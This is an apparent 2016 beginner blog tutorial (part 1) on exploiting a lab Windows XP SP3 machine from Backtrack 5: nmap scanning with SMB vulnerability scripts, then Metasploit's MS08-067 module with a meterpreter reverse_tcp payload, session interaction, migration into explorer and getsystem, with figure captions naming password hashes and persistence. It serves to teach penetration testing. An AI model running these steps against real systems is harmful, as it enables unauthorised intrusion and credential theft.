Wednesday, December 21, 2016

Hacking with backtrack 5 P1

My First Hack
Basic Introduction to Metasploit Framework
Hey Guys, are you ready for owning our first machine?
Yes, today we go together in the word of ethical hacking, we try to exploit our first machine, but not like a script kiddies, but with the five step of professional pentest… yes the machine has onboard an old operating system, yes the exploit is also old, but I hope you understand all our step and, with patience and study, you can exploit in the same manner newer machine….

For this lab I use an old Windows XP Sp3 italian and my favorite attacking machine with Backtrack 5R3 x64, the Ip address of the target is and my IP is This article is for beginner for this reason only to word to set attacker IP address, BT 5 R3 has a dhcp client deamon dhclient3 started by default, but I can set my IP statically with three simple commands:
Ifconfig eth0 192.1689.254.3/24 → for setting IP and subnet
route add default gw → for setting default gateway

                                                               Figure 1. Static IP

Figure 2. Start dhcp client

echo nameserver > /etc/resolv.conf → for setting the DNS server, now I will use google DNS server

You can stop the dhco client service with → killall dhclient3 without this command you can loose your IP when the dhclient timeot end and the daemon start with a new dhcpdiscover.
If you prefer dhcp, you can force the process with the command → dhclient3 (Figure 2).
For a more realistic environment I have installed in the target machine Avast free antivirus ed.2012 with the last signature database (Figure 3).

Normally I use Vmware Workstation for my labs, today I am using the version 9.0.1, no matter for network setup, now I work in bridged mode, but you can use your preferred configuration, the only issue is to set all virtual machine in the same manner.
Now I will work in professional way, like ethical hackers and not a black hat, for do this I need to respect ROE (role of engagement) for ensure SLA (service level agreement), but this is not enough, to ensure metrics and repeatability we need to use a well known methodology, is out of scope of this article explain in detail complex methodology like OSTMM, but the more simple methodology is the use of five step; two step of pre-attack phase, the attack phase and other two step of post-attack phase.
Step 1 – Scanning
For this purpose I use nmap, in my opinion nmap is the better choice for network scanning, you can scan the network in many way, but if your ROE in- clude low noise you can’t use the scanner with all default settings, like:
nmap (just only for timing, I work with the single IP and not with the entire subnet)If I use all nmap defaults I will scan 1000 port ( with T3 timing, with T3 nmap include parallelization of scanned ports (T0 wait 5 min. between sending each probe, T1 wait 15 sec. and T2 wait 04 sec. –, for a more stealth scan I choose only few port, in my example the ports 80,139,445,21 and 3389 and I

Figure 4. Scanning with nmap

Figure 5. smb-check-vulns script

set the timing manually, in real life I will choose T0, but in this example, and only for not wasting time, I use T3. With the switch –sV I tell nmap to scan services versions.
nmap -p 80,139,445,21,3389 -sV -O -T3
The first interesting information is the ports 139 and 445 are open, and nmap try also to discover the Operating System version
OS CPE: cpe:/o:microsoft:windows_xp::sp3 OS details: Microsoft Windows XP SP3
Mmmmh, if you are an experienced pentester the couple winXp and port 139(or 445) Tcp open sug- gests an SMB vulnerability…ok, go deeper using nmap scripts…

Step 2 – Enumeration
We have a lot of tools and techniques for enumeration, if you are very aggressive, you can use Nessus or OpenVas or other vulnerability assessment tools, for this demo I will use some NSE scripts, NSE is Nmap Scripting Engine, this kind of scripts can hel you in a lot of situation, if you want to know more about nse scripts you can

Figure 6. smb-os-discovery script

Figure 7. Run nmap scripts

read the documentation at: In our example I use only two scripts, this is a good tecnique for keep down the noise, if you don’t have this problem you can use all scripts or a scripts family, you can also use some scripts. The “default” family using the nmap’s switchs: –A, this switch execute –sV, version scan, –O detection of operating system, traceroute and the default family of NSE scripts, the scripts that make the various families can be founded in nsedoc web page. For scanning my target I use smbcheck-vulns script for check if the target is vulnerable for some well-known attacks, the second script is smb-os-discovery, this script is good for detecting the §OS version via SMB discovery. The first script can be dangerous, for this, nmap don’t use directly, for the right execution you must use the switch --script-args=unsafe=1 (Figure 5 and Figure 6).
My string become:
nmap -p 139 --script=smb-osdiscovery,smb-check-vulns --script-args=unsafe=1
After the scripts execution I can see witch the target machine are vulnerable to MS08-067 SMB re- mote buffer overflow, now I try to gain access in to the target machine.

Figure 8. Search exploit with google http://www.metasploit. com/modules/exploit/windows/smb/ms08_067_netapi

Figure 9. Exploit description in

Step 3 – gaining access
If you are a n00b is possible who you don’t know what is MS08-067… this is a GREAT exploit, just a little bit older, but great, you can use this exploit a lot of times even if you are using it against a machine already compromised, if the exploit crash, no problem you can re-use again, the next SMB exploit, the SMB exploit MS09-050 is also a good exploit, but some time you can get BSOD, if your session crash you aren’t able to compromise again the target unless the machine was rebooted… no, the MS08-067 is not like this… you can use it as many times as you want in any way you want ... of course if the service is started: D.
But if you don’t know this exploit… google is your friend… if I put my question in google: "metasploit ms08 067 netapi" you can get the page in site (Figure 8-10)…
As you can see, this exploit work with a lot of operating system from windows 2000 universal to windows XP sp3, the exploit has also the default option “automatic targeting”…great…
Now I can start metaploit in my attacking machine, in my installation metasploit is in /git/ metasploit/metasploit-framework if your path is different you need to modify the change directory operation…In my machine:

Figure 10. Target OS for my exploit
cd /git/metasploit/metasploit-framework search ms08-067

Is also possible witch your metasploit path was in executable’s path, in this case you need only to call metasploit console…
OK, now I am in the correct directory and I can start msfconsole, my preferred metasploit interface:
./msfconsole ( if you are invoking metasploit console from another directory because the binary is in the executable search path you must type only msfconsole without the “./”; Figure 11).
Now, if I don’t know where the exploit is, I can search with the command:

Figure 11. Starting msfconsole

Figure 12. Searching exploit in metasploit

Figure 13. Exploit info

I type  use exploit/windows/smb/ms08_067_netapi  for

set my exploit and with the command info I can have, more or less, the same output of the web page of the Figures 13 and 14.
I need to set my payload and other required options, if I can I use meterpreter, and the revers payloads are very usefull , you can also choose payload like reverse_http that comply with protocolrequirement

Figure 14. Exploit info – cont

Figure 15. Setting exploit

Figure 16. Gotcha

set PAYLOAD windows/meterpreter/reverse_tcp set RHOST

RHost is the target machine, lhost is the machine where I want to go the reverse shell.
With show options I can verify my settings and with exploit I can run my exploit.
In real word I use exploit –j because with this option you can force the active module to the background (Figure 15 and 16).

Figure 17. Start interaction

Figure 18. Target processes

Figure 19. Migrate to another process

Figure 20. Password hashes

In Figure 16, you can see the creation of your first meterpreter session… very well, you are a hacker now… 
….mmmmhh… it is not so simple… you have still a long way… but this is your first 0wning… this is the beginning… now you can interact with your session using the command:
sessions –i 1
With getuid you can show your current user and with getpid you can see your process id, the command ps is for showing the processes, at this point you can migrate from your current process to an

Figure 21. Oops

Figure 22. Avast wins

Figure 23. Ok, try again

Figure 24. Uninstall metsvc

other…in this case I want to migrate to explorer process, this is a good process, normally the users don’t kill explorer until the machine turn off.
In my example explorer has PID 1084 and I type:
migrate 1084 

If I need system privilege I can try privilege escalation with getsystem command.

Figure 25. Avast processes

Figure 26. Trying another way

Figure 27. Avast 2 – Persistence 0

Figure 28. Go to RDP

To Be Continuous

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